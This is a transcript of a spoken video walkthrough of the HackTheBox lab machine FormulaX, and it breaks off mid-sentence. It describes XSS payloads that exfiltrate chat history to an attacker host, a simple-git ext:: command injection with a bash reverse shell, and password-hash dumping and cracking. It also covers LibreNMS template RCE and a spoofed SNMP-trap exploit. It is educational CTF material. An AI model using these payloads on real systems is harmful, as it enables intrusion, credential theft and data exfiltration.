What's going on YouTube? This is IPSec. We're doing FormulaX from HackTheBox, which has three main parts. It starts off with a website that is really a chatbot that you can message it over Socket.io and find out it's a cross-site scripting challenge that is pretty fun. The second part is attacking LibreNMS, and there's two ways to do this. There is a CVE against LibreNMS with SNMP Traps, and there's also just a file disclosure vulnerability because the LibreNMS Directory is set to be executable but not readable. So if you know scripts in that directory's name, you're able to access it. And then the third and final step is going to be you can run OpenOffice as root and set up the headless mode so you can talk to OpenOffice over the network. And there's two ways to do this one. The way we're going to show is just exploiting the protocol that OpenOffice uses to expose the headless mode version of the process. So with that being said, let's just jump in. As always, we're going to start off with an nmap. So -sc for default scripts, sv, enumerate versions, -vv for double verbose. This gives us the TTL and things like that. OA, output all formats, put in the nmap directory and call it FormulaX. Then the IP address of 10.10.11.6. This can take some time to run, so I've already ran it. Looking at the result, we have just two ports open. The first one being SSH on port 22, and its bandwidth tells us it's an Ubuntu server. We also have HTTP on port 80. Its bandwidth tells us it's Nginx, also running on Ubuntu. And we have some HTTP headers here. The main thing is it's directing us to static index.html, but nothing really important there. So let's go take a look at the site. So I'm going to go to 10.10.11.6. And we get a page. It says your 24/7 problem-solving chatbot. And it wants us to enter an email and password and log in, or we can create an account. So I'm going to create an account. We'll do IPSec, and then we'll use password for the password. And then I'm also going to intercept this request because I want to look at all the headers on this website. So let's send this over to Burp Suite. Click register. And then I'm just going to say do intercept response. And oddly enough, it says terms is equal to true. We didn't accept any terms, but it's telling us we did. So that is somewhat interesting. This may indicate like some type of mass assignment vulnerability. I may throw other things into this parameter to see if I can like set my group to an admin. But I just want to take a look at the site right now. That's just like what's going through my head. Looking at the response to this, we can see X powered by Express. So we know this is probably going to be a Node.js application. And it's probably going to be like on MongoDB just because most Node things are deployed with Mongo, just like you see a lot of PHP with MySQL, right? For Node, it's the main stack. So we have registration successful. So let's go ahead and log in. Go with root, my email and password, and we can chat now. And there's also a few links. We have a about, a change password, a contact us. So if we go to the chat application, it just says, greetings, how may I help you? I'll say hello. And it says the service is not available. However, I can still use help to browse the commands. So we'll do help. And it has a command called history. If I type that, it's going to tell me all the commands I sent. We can take a look at exactly how this is working. So if I turn intercept on, I type help. We can see it's doing a post to Socket.io and sending this message. And this looks like it's all through potentially WebSocket. I don't know exactly. I don't think it's exactly through WebSockets because their WebSocket history is blank. Maybe it's just a weird polling from Socket.io. I don't know exactly what's going on yet, but let's go take a look at About Us. And we just have a lot of text that doesn't look too helpful. If we go to the change password, we have an old password, a new password, and confirm new. I don't have a way to like try an IDOR vulnerability to change someone else's password, right? We can try intercepting this. So I'll do a bad old password. And then let's look at this request. So I'm going to go to proxy, intercept on, change. And the main things I'm looking for is, did it have a way to pass in a username? Because if it did, then I'll try resetting a like admin's password or something like that. The other thing is, I want to see if this old password is actually needed. Because if the old password isn't needed, if I find cross-site scripting later on, I can have like a cross-site scripting payload make this post request on behalf of the user and change the password, right? But it looks like if we don't put old password, there's an invalid request. We could also try type juggling here. So if I do old password is not equal to, we'll just do IPSEC like that, right? Not correct. That completely errored. Double quoted property name at JSON. So I'm guessing this does not work. I'm pretty sure you quote this and no Mongo injection. But I was trying to find a way to reset the password without knowing the old password. Since I can't really do that, then I'm going to move on and kind of forget this password change functionality existed just because I can't get it working without knowing the old password. So it doesn't help me. I'm guessing my user ID is in the cookie. So that's how the application's knowing whose password to reset. So let's move on from that. And then we have a contact us. So let's see. First name, we'll do IPSEC. And then let's just do a cross-site scripting payload. So we'll do image source, HTTP 10.10.14.8 port 8000 slash XSS, I guess. Let's just see if this works. So we'll do slash image there. We should set up a listener. And I normally don't use the simple HTTP server right away when I'm just doing this on like CTFs because I like seeing all the headers that get sent. And we don't see the headers with like a Python simple HTTP server. So I wouldn't know like the user's browser is on chatbot.htb. Like seeing this referral header when doing a cross-site scripting test is super important right away because I know now what the browser is doing. Since I can see there is cross-site scripting here, the first thing I want to check is how the cookie is stored. Because if it doesn't have the HTTP only flag, I can just exfil it with a document.cookie. But HTTP only is set. So now I'm thinking I have cross-site scripting, but I have to make the user's browser do something. I've already kind of ruled out the password reset because we need to know the old password. There is this chat application. If we say history, we get all the messages sent. So we have to build a cross-site scripting payload to get the history of what this user is sending. So the first thing to do is try to find a easy way to load JavaScript from the user, right? Because I don't want to have to, when I change my payload to send a new contact, I just want to have this on my repeater window and then click replay. Then the user's browser goes to my web server, pulls a JavaScript payload, and then runs it. So I'm going to try script source is equal to HTTP 10.10.14.8 port 8000. I'll call it payload.js. And we'll see if their browser hits us, right? So let's just clear the screen, run this, and we got invalid tokens. So one of the annoying things about this is periodically the user database will get wiped and you have to recreate an account. So let's do that real quick. IPSEC that, password, register, log in. And if I have to do this multiple times in this video, I will probably just edit myself out of changing this because every time it wastes a couple minutes. So let's try that script again. So script source is equal to HTTP 10.10.14.8 8000 /script. So we're going to run this again, send the message, and see if we get a hit. I normally wait when I'm doing CTF 60 seconds to see if I get a hit. Sometimes I'll wait 2 minutes, but I'm going to wait 60 and then we'll come back. So it's been a minute and this payload did not work. So what I'm going to do is go over into Burp Suite, go to my history. I'm going to grab this contact and I'm going to try something else. So we knew the image source worked. So I'm going to do image source is equal to a invalid thing. I'm going to say on error is equal to fetch, then HTTP 10.10.14.8 port 8000, and I'll fetch the word fetch. Let's see. I think That's good. I'm going to put this in quotes. I don't think I need to. And I'm escaping it because we're in JSON. And then we can do a /image and we'll send this. It says message sent successfully. And we are getting hits now on /fetch. It is getting me an options because we do have a CORS header being set, I think in the response. So it's doing like a CORS pre-flight check. If we wanted to prevent that, we could say, let's see, after the URL, we could say, what is it? A dictionary, then mode, no CORS, like that. Message sent. And now it switched over to a GET. We could also say method get, method post, whatever. But if you did not want to request an option, that is how you handle when dealing with CORS. So we know we have JavaScript execution. So my next thing to do is build a payload that I can put on this on error that just is a cradle to load the JavaScript on my server. So I don't have to keep playing with that, right? So let's just do, I'm going to call this cradle.js, I guess. And we haven't shown it on this channel. We're going to manipulate the DOM in order to load this. And we'll step through it slowly. So we're going to create a script object. And that's just going to be a document.create element script. And then on this object, we're going to, let's see, it's a script.set attribute. We're going to tell it that it is a script. And its source is going to be at 10, 10, 14, 8, 8000. I'm going to call it DOM technique because I don't know if this is exactly DOM XSS or not. Definitions are weird. So I'll call it DOM XSS technique. And we'll change that out to be payload later on. And then all we have to do now is say document.head, append child, and then on script. So let's step through this real quick. If I copy each of these lines and go to a new tab in my browser, let's go open up this, and we can see the page is pretty blank. So if I go in the console tab, and we're going to run each of these. So we created that script. Then I'm going to set this attribute. And if we go to inspect, nothing has changed, right? But when we edit the document like this to append to the head of this script, what's going to happen is we're going to manipulate the web page that's being displayed, and our browser is going to auto load the script, right? So I'm going to hit this. CSP is blocked. But if we go to the inspector, we see it has been loaded. And if I go, I don't even have a listener up. But that's essentially what's happening here. So let's put this all on one line. And then we can cat cradle. And we're going to put this in for the contact. So let's do NC LVNP 8000. And then on this on error, I'm going to put this in. I'm going to try it without quotes. Actually, we can use double quotes here because I've never used double quotes in this payload, I think. So that may actually be fine. Right? Yeah, that's fine. Message sent. And let's give it a sec. Oh, we got it. We have a get on this. So now we have the browser trying to load something off of our server. So finally, what I want to do is I'm just going to call this exploit.js to make it easier. Let's make a directory www v exploit.js, and I'm going to just have it fetch HTTP 10, 10, 14, 8, 8000 success, like that. Python 3 HTTP server. Send it. And we get exploit and then success. So now we know we have an easy way to modify some JavaScript and get it executing from the server. So what we have to do now is build a payload that's going to interact with this chat application because we want to be able to send the message history and get everything back, right? So if we look at how this works, let's just turn intercept on, submit query. We send this. Can I send this to repeater? Does that work? It just says OK back. Forward, socket IO. This is going to be a pain, isn't it? Oh, here we go. We have it coming back in the message. So this is all in JavaScript. So what I want to do is look at the source. So let's press Control U. Oh, it wants us to send the token. That's a bit odd. Let's just go here. We don't want to post. This is the page we want. Not modified. Let's get rid of the cache header so we can see the source code easily. So how's it working? It's going to load socket.io, and that loads this chat.js. So let's take a look at what chat.js is. If we can probably just say chat.js, it's going to make a get to this user API chat. So what does this do? It just says chat room. So we want to make a get here. And it doesn't look like we ever used the result of this because nothing important came back. But I'm still going to make this request. If we don't, nothing's going to work. It took me a lot of troubleshooting to figure that out. This is probably just setting up something on my session that we can't see on a browser. But we need to make a get there. I guess we can test it when we're playing with it and show all the troubleshooting. Then we create a socket.io object. We do this with credentials true, so the browser knows to send our cookie to that endpoint. And then what it's doing is hooking this message and then displaying it. So what we want to do here is in our client, instead of saying show messages on screen, we're going to fetch back to our server and send the message back to us. And that should pretty much be it. So let's go back to payload.js. And what we want to do, we're going to kind of copy the Cradle. So I'm going to actually change this Cradle here. There we go. We can call it exploit.js. Let's get rid of these multi-line things, or make it multi-line. Okay. So instead of calling it script, I'm going to call this one socket.io because we have to load socket.io up. And then this can just be, what is it? When burp. It's on chat HTML. Grab this. Load that. And then we append socket.io like that. So now we have socket.io loaded in the browser. So the next thing I'm going to have to do is I'm going to define the CORS header real quick. We'll do options. I'm going to say the method is going to be a get, and the mode is going to be no CORS, like that. And now what we want to do is trigger an action when the script loads. There's two ways we could do it. We could do just a script on load is equal to an event notification like this, but this triggers whenever a script is loaded in the browser, probably not the best case. We can be specific by just saying socket.io, then add a event listener, and then say when this script loads, then we go over to an event notification. Think I'm doing that right. And I don't know if event notification is the right word. I do not know JavaScript well, but I think this is right. So what I'm going to do here is we're first going to fetch, and then we can say, was it user API chat? I think it's /user, right? Where's chat.js? That's this one right here. User API. I wasn't sure if it was US or user spelled out. And then I'm going to also send it the options that we made, so it does a GET request. We could have also used like the Axios thing, but I didn't feel like loading Axios. They did Axios GET, right? So we fetch that, And then what we want to do is create the socket. So do var socket IO. Is that how they do it? Yep. And then what is it? With credentials. With credentials. True. Like that. So after we load the socket, then we can say socket on. So a hooking message. And then they call the variable myMessage. Like that. And then they go to an event like this. And what they're doing is they're taking myMessage and passing it to this function. But all we want to do is another fetch. We'll fetch HTTP 10.10.14.8, 8000. And I'll say m is equal to, and don't do plus my message. And I'm going to do B to A. So it's going to base 64 to ASCII. Then we say, what is this? Options. So we do a GET request. And I think that's it. Actually, we need to, let's see. That's good. I don't like that my Vim is trying to indent me again, which makes me think I missed a quote or a parenthesis. I think I did. Yep. There we go. Did I do that the wrong order? There you go. When your IDE puts you at like the wrong indentation, you know something's wrong. What we have to do is send a message. And that was what? Socket.emit, I think. Yeah, right here, typing chat. We do socket emit, and then we send the message here. So we can copy that. Socket emit, client message, and we're going to say history. And then, let's see. We've already closed that out. And we're going to run this in our browser. So let's load this. And we can change that name because it's no longer that. Just call it exploit.js. There we go. Let's grab this. And I'm going to guess I'm going to have to re-register my account. It's probably been long enough. Let's see. Here it is. We just want to go here. Oh, it's already loaded. Sweet. So we did a get, and we're not getting anything. So let's load this up in our browser. Let's see. There we go. So I should be able to just go to any page, go to this console tab, send this, and then my browser should make all the same requests, right? We can, I'll do it on the contact page. Send this, script, exploit, head, append. I want to make sure we're getting this. Send. Script is not defined. Document create element script, because I did not copy the whole thing. There we go. Syntax error. Invalid arrow function arguments. Let me run that again. So we have a syntax error. Let's see. Where did we screw up? I wonder if I need to put semicolons there. redeclaration of script. That's probably my console. Still thinks it's a syntax error, I think. And I see it. I forgot to do a comma right there. That should do it. So let's go back, refresh, run this again. Does give me an error, but we do get all the messages. I don't know exactly what that's about. Some type of WebSocket issue. But I think if WebSockets fails, then it falls back to doing this post request is going to be my guess. I think it's trying to set up the, It's trying to set up the WebSocket session, fails, and then falls through this HTTP polling through Socket.io is my guess at what's going on. So now we have that working. Before I send it to the server, I do want to do one thing that I started growing more and more conscious of, and always using some type of error handling. So I'm going to wrap this in a try case. So we'll do try, and we will catch the error. And on error, we don't want to say console log error because we don't have control of the browser. So I'll just do fetch HTTP 10.10.14.8, 8000. And I'm going to say E is equal to, then we can say B2A, what do we call it? Error. And then options, like that. And we could also say, I think I want to do it above event listener. I'm going to say socket.io on error is equal to, is that it? Yeah, I think it's this. On error is equal to event. And then I wonder if I can do it on at event listener on error. I'm not sure. There's probably a better way to define this. Go to the event notification and just copy this fetch. And this should probably be, I think that's right. Okay. Hopefully I didn't screw up the whole script by adding that. I know I screwed up the indentation. Let's send this. And it looks like it's still working. Okay. So now let's send this payload over to the target. 10.10.14.8 exploit.js. So we send it. We should get, 10.10.11.6 reaching back to us. And we have a lot of messages. They're all M's, no E's, which is good. So let's just break that, and then let's start grabbing messages. So it starts getting it here, and I think it kind of repeats. So I'm just going to go here, echo-n, base64-d. How can I help you? There's a typo on it saying built-in commands, but that's not interesting. We probably should have made our Python web server handle this so we just don't have to do this manually, but oh well. Base64-d. That is a clipboard. Admin testing the chat application. What is the next message? Right here. Grab this. I do not like that word wrapping. Write a script for dev git auto update chatbot. This is interesting. We have a new host. So sudo v etc host. And then we can add 10.10.11.6 like that. Okay. We could keep going through all the messages, but it's not important. So I'm not going to waste time doing that. Let's go take a look at that new URL we just got. It's probably in my clipboard. Yes, it is. So let's go here. Let's turn our browser intercept off. What's going on? This is it from the future. And before we go on to the Git Auto Updater domain, I want to take a step back and explain exactly why this whole script source thing did not work earlier with a payload and why we had to resort to DOM XSS. So I've already have a root shell on the box here, and I'm in the web directory. So normally what I would do is I go into routes and I look at what routes there are. I notice there is this whole admin route. So if I go to my page and try to access /admin HTML, I can't because I'm not an admin. I had poked at how to give myself admin access, but I don't like MongoDB. So what I ended up actually doing is editing this routes file. And what I did is I took off the check admin of all the admin routes. So this way, my user should now be able to access it. So I'll save that file, and then we can do a sudo systemctl restart. It's normally like PM2 for node, right? Can I just do a star? I'm not sure if I can do that. Does not look like it. Maybe it's restarting, maybe it's not. When I had done this, I actually just rebooted the box. So maybe that's what we're going to do. Is there any service called PM2? Let's do system CTL PM2 www data restart. We do restart first. See if this will restart in a couple seconds. If it doesn't, then we'll just reboot the box and hope that we didn't break the web application by putting those comments in. It does not look like this wants to restart. So what I'm going to do, reboot the box. So that'll cause all the services to refresh, and I will pause the video and resume it when the box is back up online, because right now it's completely off. Okay, the box has now been reverted and we can access this admin panel. I also have open the contact form where we do the XSS, and I'm going to send this payload that tries to load 10.10.14.8/pwn. And then if I refresh this page, we can see user messages. And if I look at the source, let's go over here. It's probably going to be this, I think. We can see it's trying to load the script, right? Or we have the HTML to load the script, but it never actually tries. If I reload the page, we should see the message. Maybe it's cleared already. Let's see, that's probably going to be in Burp Suite. So let's just go to the very top. Let's see, get messages, this post, send it. So now we have the message again. Yes, we have it. But we never get a request to a server, and we don't see it here. And if we look at the console, there's no errors either. So I was a bit confused why this happened, because even if a script is deep within a label or a div, like it should still be executing or loading the script, right? So I looked into exactly how it gets loaded. And if I went to the proxy tab and let's see, here is where it loads, or we get admin.html. And I was kind of curious because admin.html, we had new data here, but we had a not modified. So it's not modifying this HTML ever. If I look at this user API get messages, that's when we get it. We load it after the admin. If I look at the admin JavaScript, which is unfortunately not showing, let's send it over to repeater so we can go and take a look at this JavaScript. We can see it does call get messages, and then it will auto-populate the HTML in a very similar way that we did, right? But when you set inner HTML like this, it's not actually going to change anything. Well, it'll change it, but it will not load any new scripts. It will load new images. So I'm going to try to showcase this. So I'm going to go to console. I'm going to paste this, and we should have that div. Let's see, div class add new container. And let's see, I'm going to do div inner HTML is equal to pwn, right? That's all we need to do. I wonder if we should do div/div. Okay. And then we want to append this. So we appended pwn. Awesome. So what I want to do now is let's set this to be script source is equal to HTTP 10.10.14.8 8000 pwn /script. So we're going to set that. We need to change our quotes. That's knowing how auto did doubles. There we go. And if we go back to the network tab, we never loaded it. We don't have a load there. We changed inner HTML, but it doesn't go and auto-populate because it's a script. If we change that to be an image, so I'm going to change from script to image, and let's close out the image. Let's see. Our browser now suddenly makes a request. When we close it, it's going to tell us the image is invalid. So this is why we can use that one gadget with the on error in order to trick it into executing JavaScript. Because when we do this image source is equal to X, it's going to fail to load that, and then it's going to go and say, oh, I want to process this error message, right? So that's all that's happening here. So that explains why the whole script tag didn't work. And then we had to resort to using the image JavaScript with on error. And then we went into a like DOM XSS type of payload. So hopefully that all makes a little bit more sense now. Let's go ahead and start looking at that new domain, the Git Auto Updater. And if we look, it says on development, Git Auto Report Generator. And we enter a remote Git URL. So if I do HTTP 10.10.14.8 8000 project, let's see what happens here. Again, let's do the NC again so we can see it actually connect to us in all the headers. If we do git report, we have it reaching back. It's going to look for this git file. The user agent is git2341, and that's about it. We could look for exploits in Git clients. There have been a few recently, but also noticing the footer, we have simple-git v3.14. So if we just Google that with exploit, we do have some vulnerabilities. So if nothing pans out with this, then I would go look at the Git client, and maybe there's a vulnerability. It's kind of like zip-slip, I think, where you can just include files and things like that. Or maybe we could put like a Git hook in, and then when it deploys or clones, it executes. There's a lot of things we could play with that Git client. But the first thing I always look at is the low-hanging fruit. And that is whenever you see a banner with a version, you Google that version to see what there is. So this looks like it is, let's see, git list remote, or we'll clone push. So this looks like it may be possible. I don't know exactly how we could pass options into this. If I look here, this is doing a command, and it's touching a file. Let's see, is there another thing? There's a GitHub commit, unsafe. Are there write-ups here that explain this better? So that's the git commit. The doc. This is not it. I swear I saw a page explaining this a little bit better. Let's see, is there a CVE? I'm going to pause the video and find a better page for this that kind of explains it. Because I swear I clicked on something and explained that this percent was just an escape for the plus. But I can't find that here. Okay, so I paused the video and remembered exactly my thought process here. I went to look at the older thing because it says it's an incomplete fix for this. And this CVE is very similar. We're doing get to clone, except we're passing a file wrapper here, right? Or a file handler, or whatever that's called. Now we're just using this. So what I had done is I Googled what ext is because I thought this would be like extension. Actually, I didn't Google, I chat GPT'd. And I got that it was a, what is it? It's an external transport helper. So I looked into Git. So I went Git external transport helper. And now watch, I won't be able to find it, but here it is. This is the page. And you find these type of vulnerabilities quite a bit, right? This is essentially just a wrapper around Git that has a lot of features. You're just supposed to, like most people, just clone like HTTP or SSH, but you can pass a lot of advanced things into clone, like that file wrapper. This one's going to be this external remote transport that can do commands. And the whole logic behind it would be if you had a file or something. Let's see. Do they have it here? This is not the actual page. It's not a Git helper. Here we go. Git remote ext. So this is explaining what that is. If we want to do a space, we put a percent before it, probably because of some like weird arg parsing thing. But like examples of them using this for legitimately is setting up like a SOCAT tunnel before you do a get, or like an SSH tunnel before you get, right? So that's why this feature exists. But just because the people that made like the whole library or the simple-git web service that used this library didn't realize it could support a lot of extra things here, that's why it got in. So let's play with this real quick. We should be able just to go back here. And what are they doing? They're doing extsh and then a command. So let's do this get updater, and that's got to be a typo. It's something. I think it's an ER, right? That just looks off to me, but I digress. Let's do. I like doing sleeps, so we can do sleep 1 first, and we'll see if it returns to us. If sleep doesn't work, then I normally result to like a ping. I did intercept this. We have 184 milliseconds, so that's definitely not right. Let's see. Oh, what I just got done saying. We need percents where there are spaces. Is there a space here? Let's see. Let's go back to the advisory. Remote code. SH. They do a percent after the C. So right here, this looks like it is now sleeping 2 seconds. We see 2,100 milliseconds. This is going to be 1,000 milliseconds. So now we have command execution. I'm going to try seeing if we can also do it through bash, because if we do it through bash, it makes one thing a little bit easier. Yes, it does. And that is a reverse shell, because if we didn't have that, if we used sh, then we have to do a bash-c, then wrap this bash-i. But if we're already in bash, we should just be able to do the reverse shell, right? So 10, 10, 14, 8, 9001, 0, and 1 like that. And we have to put percents where we want spaces, like that. And then nc lvnp 9001, send this, and we get a shell back. So let's get a TTY setup. So pty spawn bin bash. Then we can background. And we can export term is equal to xterm so we can clear the screen. Awesome. So now with the shell, there's a lot of different paths we can go with recon. And this is one of the reasons why I don't like just running an automated recon tool, because it can be flooded with a lot of things. If we ran linps, we would notice there's multiple sites running. Like if I look at all the ports, we have service on 8,000, 8081, 8082, 3,000. There's a lot of just ports listing that we could be looking into. It'll also say Python is got a capability set. So if we do Python 310 on git cap, we can see it as capnet raw, which is unique. So there's a lot of just things going on here. I guess with Python capnet raw, maybe we could like listen on a socket, like do our own TCP dump and potentially intercept cron jobs that are running to steal a password. Maybe that's possible. I'm just thinking about that as I'm talking about in this video. I didn't actually do that. There's also a directory, if we go ls opt, this LibreNMS that we can go into, but we can't read files out of it, or we can't like list the contents because we don't have the read permission. So that's interesting. There's just so much going on. So what I generally start with is, as a web user, I try to dump passwords first. So that's where I'm going to start logically. So if we go in app, let's see, how is this working? It's probably Mongo, right? grep-r, is there an environment variable or file? There is, .env. Let's see, Mongo, localhost. Let's see, how do we do this? If I just do Mongo dump, do we have it? Mongo dump. Dump, there we go. So it just magically dumps things. So if we go into testing, we have these BSON files. If we want to convert the BSON to JSON, I think it's JSON, we do BSON dump. So we can go users.bson, and then we have hashes. So we should log this. If we go up, we can say web secret v notes web secret. And I don't even know what site this is. I think this is going to be the main site, but I didn't do a good job at even enumerating that. And then we can grab these two. Let's see. Let's just do this. Grab that. Admin, and then Frank, is it Dorky? Is that what it said? Frank_Dorky. We can put this password. And then go here. Save that. And now what I'm thinking, let's see, we got name, email, terms. I'm looking to see if there was a group, because if there is a group, I would test out the mass assignment real quick, but I don't see it. We have authorization token. So I guess that's if they're logged in, it'll put the token here. That is bizarre. Let's see. So by it not having my user, I'm going to guess that my session's dead, right? Invalid token. Awesome. So let's go back to this registration. We can just go proxy, history, get rid of that socket IO, API register. And what I want to do is we're going to test mass assignment. Let's see. Authorization token. I will call it please subscribe. So I want to see if I can write in this field. Registration successful. Mongo dump. Dump. Testing. BSON dump. Users. BSON. This is me. Right. IPsec. I don't have any value for authorization token. So I don't think it is a mass assignment. I don't know what value is, but okay. So that's enough sidetracking there, but normally when I do web apps, I always go back and see if I missed something, right? So when I just have ideas of things, maybe I can't exploit it right away, but once I know more, then I can validate it. Let's just grab these last two, go over to the Kraken and try to crack these passwords. So this is just a box I have on my network. You don't need a separate box. You can just run Hashcat, but try to do so in your host. Don't run Hashcat in a VM because it'll go a lot slower than you expect. Hashes, we're going to call this, what's the box name? FormulaX.bcrypt. Paste. Hashcat.bin. We got to give it the username option because that's how we have it logged. And we'll just use RockU to see if we get anything. We need to specify a mode. That's going to be 3200. And let's see if this gets started. Runtime for devices. Come on. And almost immediately we have a hit. Frankie Dorkey's password is Manchester United. So if we go ahead and try this, so we can just try to, let's actually check if that user's there. So I'm going to grep passwd for everything that ends in sh. We see Frank Dorkey does have one. We also see a Kai Relay user and a LibreNMS, which is a network monitoring application. Let's do sh Frank Dorkey at 10.10.11.6. And we could have just an SU, but I like using SSH just because it'll give me a better terminal. And also it'll let me just do like these SSH commands so I can set up tunnels. So this will be called low priv. I'll call it www data. I'm going to call this one Frank Dorkey just to keep my pains easy. And that's where user.txt is. You don't actually have to ever get to this user. You can do an unintended in LibreNMS. But the whole reason we did this is, I'll show real quick. Let's see, we do SSLNTP. We see there's multiple ports listening. We don't see the PID because we're not root. The easy way to see PIDs normally is to go into Etsy and then grep for that port. Let's see. We have Nginx listening. There we go. Nginx is listening on that because it's forwarding to LibreNMS, right? So if we wanted to, we could look at port, what was it, like 8000 as well. Let's hide error messages. Probably not LibreOffice. I don't see anything there. If we go Etsy, Nginx, sites enabled, default. Let's see, it's listening on 80. So on 80, it's doing a proxy pass to port 8082. And also 8081. So we can see what all these websites are being used. 8081 was the Git Auto Updater if the hostname was dev git whatever, and everything else is 8082. I think there was another port though, 8000. So we have 8081, 8082. If we do psef grep 8000, we don't see anything. I know there's a way to see what's listening here. Let's see. Grep 8000. Nope. Maybe not. It's definitely not LibreOffice. I'm not seeing an easy way to see what's listening on port 8000 other than just testing it. So what I'm going to do, the squiggly C thing, if it's the first thing you type on a line in SSH, drops you here. We can set a dynamic proxy up, and then we can just go and hit it, right? So if I go to SOX5 on my thing, 127.0.0.1, port 8000, we get this remote management open office work. And if we go to 3000, we get LibreNMS. So we can try the users here. Was it Frank, Dorky, and let's do Manchester United. Put that on my clipboard, paste it in, invalid. If we try to log in here, we can log into LibreNMS, but we don't really get anything. We're just a low privilege user here. What you're supposed to do is, I think we go to About, if I can click on it. And it says the version of LibreNMS that is running. And there is a vulnerability here that we'll exploit in a little bit. But I think it's easier to show the exploit because it is a cross-site scripting one. If instead of going straight there, we show a fun unintended. So if I went into opt LibreNMS, and the whole reason I can do this is because the executable bit is set, but the read bit is not. So since executable is set on a directory, that means I can go in, but I can't list the files. However, if I know the file name or the directory name, let's say cd config, now I can go in and I actually have read execute on config. I don't know a good way to show that. Name, oh, we probably do stat, right? Stat config. There we go. These are permissions set, right? So if I look at LibreNMS, so my first thing was like LibreNMS default credentials, and then I went down a rabbit hole, or I don't want to say rabbit hole, went down like on setting it up. And one of these pages talked about a script called adduser.php that we have access to. And it's going through a convoluted route to authenticate because it loads like this plugin. And then from this, what is it? LibreNMS. Then was it authentication? What's the next piece? V legacy auth. We don't have V. Well, cat. It'll load a bunch of other libraries. So it can actually get the password easily. The actual password is in custom.env. This was changed for the box, so it made it harder to read. I don't know a good way to actually get this password unless you step through all the config files or all the libraries and eventually find something that loads this. But I digress, because when setting up LibreNMS, it tells you to use this adduser PHP script to add users to the box. So we can just execute the script since we have read access on it. And we can say ipsec password, we'll give it a level 10 access. It says ipsec was added. So now I can go into LibreNMS. So let's go 127.0.0.1.3000. We have to set the socks proxy back up. Let's log out. And then I log in as ipsec. And we get access. So now I am an admin on this box. That makes it a bit easier to see what we're going to be doing. So the exploit is going to take advantage of an alert piece. Let's see, where is that? Alert rules. Is it alert template? Yeah, alert template is what it's going to take advantage of. So in this template, we can specify PHP code. So let's see, LibreNMS alert template execute PHP. Is it going to find it easily? I probably have to turn the proxy off again. Let's see, LibreNMS templates. So we say, where is it? Is it just at PHP? Let's try at PHP real quick. So we do at PHP and probably nphp. System ping 10.10.14.8. And we probably have to ping with a count. Is it C or N? It is C. Sudo tcp dump -i ton 0 ICMP. I also want to add the -n to disable DNS translation. If I create this template, it's not creating. So this has a hard-coded URL in. Whenever I click create template, it's trying to create it on LibreNMS.com port 3000. So that's what the host name LibreNMS thinks it is. So we have to add that to our box. So we do etc host. And on 127, we can say LibreNMS.com. So now this will resolve. The issue is when we access it, we don't have a cookie for LibreNMS, so it's not going to be authenticated. So we have to reload the website and log in again. Let's see, HTTP. LibreNMS.com. That was written, right? Yeah. Oh, proxy chains. There we go. IPsec, password. And let's try this template again. Alert templates. Create. System ping C1 10.10.14.8. We'll see if we get any hits. We do. We have a ping come in. So we can try doing this as a shell. So let's do nclvnp 9001. We're going to go back, create another template. Test2. And we can say --c --i dev tcp 10.10.14.8 9001 0 and 1 like that. Great template. That one did not execute. I did not close out the single quote. It's hanging because we got a shell. So let's stand up a better one. Okay, st2i raw minus echo foreground. I did that in the wrong pane. I wonder if that screws things up. It does. Reset. Xterm. Awesome. Export term is equal to xterm. And I'm going to send this over to pane 3. We can exit hashcat. I call this LibreNMS. And now that we know this whole piece, we're going to step back and actually do the exploit because that was interesting, right? And the exploit is what taught me about this template. I didn't just know this off the top of my head, but eventually we're going to use a bunch of JavaScript in order to execute this. So it was nice being able to see it visually before we go into blind attack mode, right? So let's just log back in as Frank Dorkey. Manchester United is the password. Awesome. So we're back here. If we look at the version, we can grab this. We notice it's from 2022, so it's a couple years old. I'm going to Google 2022 LibreNMS exploits. And I'm going to have to really fix this to like only proxy some things. We get this Sonar post that talks about an exploit in the SNMP Trap. And I would recommend reading this entire thing because it explains how it works. But the proof of concept here isn't the greatest. There was a post if we did a lot more Googling around or say LibreNMS, XSS to RCE. This post on Hunter was really good. So it talks about it. And here's the proof of concept. So what they're doing is they're going to make a fetch request on Ajax form. And this is where we set the alert template. And then what they're going to do is execute bash with this reverse shell. So it's the exact same payload we had used. They're just doing it through JavaScript, right? In order to trick the victim into executing it, they create an SNMP trap and send it over to LibreNMS that takes the SNMP trap, puts on the website. When a user goes to the alert, that's when it gets triggered. So we have to do two things here. And we'll actually have to run this from the box itself, because in order to trigger this, the trap has to come from a box the target knows. And we can't forge the IP address and then send it to the VPN connection, because I think OpenVPN will reject it. But we can if we're on the same broadcast domain. You can spoof who it comes from in SNMP because it's UDP. I don't think you can in version 3, but version 2, I believe you can, right? So let's do dev shm v exploit.py. Oh my God, we have to use nano. That's horrific. So we'll send this. Let's see. We're going to change where the payload is. So this should be, oh my God. Let's see. I don't think I saved anything. We'll do 10.10.14.8, and I'll call this libri.js so we can stay straight. Save that buffer. And there's one thing we have to do. We have to spoof the source, because this is going to be where it's coming from, right? So if we go back into LibreNMS, look at devices, we probably have to send this through Burp Suite now, or not Burp Suite, or proxy. Refresh. Let's see. Do we have something? If we go to manage groups, let's see. This is just taking forever. I just excluded this host, didn't I? Options, proxies, SOCKS 5. I have no idea what I just did. I clicked exclude host and everything went to crap. And I thought it would be here. Oh, here we go. It's excluded at this global config. That's annoying. I thought it'd be excluded in this proxies thing. So what I'm going to do here is I'm going to change it up a little bit, and I'm going to have this proxy only take effect on, is it LibreNMS.com? If I test this, let's see, LibreNMS.com, port 3000, some page, and matches. So what I'm doing here is in this options thing, let's see, go proxies, going to save it, and then I'm going to tell my browser to proxy by pattern. And it uses the patterns here to decide which proxy it goes to. So right now, everything goes through Burp Suite, but only LibreNMS.com will go through my SOCKS 5 proxy. So I think that's what I want. There we go. So this will let me log in. And then if the page does request like the Google font API or things like that, it will automatically not use the proxy, or use Burp Suite probably. So what we want to do is figure out a host. If I went over to maps, we can see 10.10.11.240 is a host that is configured in LibreNMS. So we can use that for an exploit. So I'm going to take the source. We can say 10.10.11.240. And then the target, this is going to be where we send it to. So this will be, we can do 127.0.0.1. If this doesn't work, then we can change it up to be 10.10.11.6. I don't know which one it has to be. Okay, so we can save this. And then because Python has that capability already, it should be able to forge this packet and send it. So we sent the one packet, and I just noticed or remembered we're not listening. Let's see. We're here. We need to stand up a web server. Yeah, we don't have anything. So let's go www. We called this libri.js. We did. vlibri.js. Go back to the page on Hunter. And we want to grab this. Paste our JavaScript. And then the reverse shell goes to 10.10.14.8 on 9001. Okay. Python 3, HTTP server, and let us send this packet. Not cat, send it. We sent one. And we can probably trigger it ourselves. If I click on logs here, let's see. We don't see anything. Maybe 